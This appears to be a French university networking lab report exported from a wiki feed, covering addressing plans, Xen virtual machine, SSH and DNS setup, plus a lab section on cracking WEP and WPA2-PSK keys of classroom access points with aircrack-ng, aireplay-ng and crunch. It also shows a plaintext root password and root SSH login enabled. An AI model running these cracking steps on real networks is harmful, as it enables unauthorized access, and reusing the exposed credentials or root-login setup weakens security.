Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56999</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56999"/>
				<updated>2021-12-13T15:33:13Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer { [IP ns6.gandi.net]; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
&lt;br /&gt;
[esquisse à compléter]&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
